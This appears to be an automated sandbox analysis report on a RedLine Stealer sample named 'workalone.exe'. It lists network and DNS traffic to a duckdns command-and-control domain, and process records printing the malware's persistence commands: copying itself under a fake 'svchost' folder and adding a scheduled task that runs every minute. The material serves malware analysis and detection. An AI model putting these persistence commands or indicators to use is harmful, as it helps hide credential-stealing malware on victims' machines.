Nov 30, 2022 00:08:08.302516937 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.302608967 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.302635908 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.302661896 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.302783012 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.304261923 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.329659939 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.329730988 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.329937935 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.330197096 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.330393076 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.330487013 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.331543922 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.331660986 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.331897974 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.332432032 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.332724094 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.333273888 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.333509922 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.333692074 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.333694935 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.333961010 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.334039927 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.334115982 CET  49687        46539      192.168.2.3      85.208.136.178
Nov 30, 2022 00:08:08.335695982 CET  46539        49687      85.208.136.178   192.168.2.3
Nov 30, 2022 00:08:08.335901022 CET  46539        49687      85.208.136.178   192.168.2.3
                                                          Nov 30, 2022 00:08:08.357816935 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.358990908 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359028101 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359174967 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359221935 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359349966 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359509945 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359599113 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359643936 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359833002 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.360557079 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.361654997 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.361905098 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.362641096 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.362689018 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.362763882 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.363637924 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.364617109 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365525007 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365761995 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365890026 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365921021 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365948915 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365995884 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.366144896 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.366528034 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.367007971 CET465394968785.208.136.178192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 00:07:25.575783014 CET | 63722 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 00:07:25.687061071 CET | 53 | 63722 | 8.8.8.8 | 192.168.2.3
Nov 30, 2022 00:07:35.732409954 CET | 65522 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 00:07:35.763092995 CET | 59869 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 00:08:07.898642063 CET | 54397 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 00:08:08.008116007 CET | 53 | 54397 | 8.8.8.8 | 192.168.2.3
Nov 30, 2022 00:08:10.978208065 CET | 59324 | 53 | 192.168.2.3 | 8.8.8.8
Nov 30, 2022 00:08:11.086960077 CET | 53 | 59324 | 8.8.8.8 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 00:07:25.575783014 CET | 192.168.2.3 | 8.8.8.8 | 0x9fd4 | Standard query (0) | saleshor12.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:07:35.732409954 CET | 192.168.2.3 | 8.8.8.8 | 0x7e82 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:07:35.763092995 CET | 192.168.2.3 | 8.8.8.8 | 0x48a3 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:08:07.898642063 CET | 192.168.2.3 | 8.8.8.8 | 0xe5fe | Standard query (0) | saleshor12.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:08:10.978208065 CET | 192.168.2.3 | 8.8.8.8 | 0x3609 | Standard query (0) | saleshor12.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 00:07:25.687061071 CET | 8.8.8.8 | 192.168.2.3 | 0x9fd4 | No error (0) | saleshor12.duckdns.org | | 85.208.136.178 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:07:35.754019976 CET | 8.8.8.8 | 192.168.2.3 | 0x7e82 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 00:07:35.783816099 CET | 8.8.8.8 | 192.168.2.3 | 0x48a3 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2022 00:08:08.008116007 CET | 8.8.8.8 | 192.168.2.3 | 0xe5fe | No error (0) | saleshor12.duckdns.org | | 85.208.136.178 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:08:11.086960077 CET | 8.8.8.8 | 192.168.2.3 | 0x3609 | No error (0) | saleshor12.duckdns.org | | 85.208.136.178 | A (IP address) | IN (0x0001) | false
                                                          • saleshor12.duckdns.org:46539

                                                          Target ID:0
                                                          Start time:00:06:58
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0x590000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0xd20000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:3
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:6
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:8
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0x960000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:9
                                                          Start time:00:07:08
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          No disassembly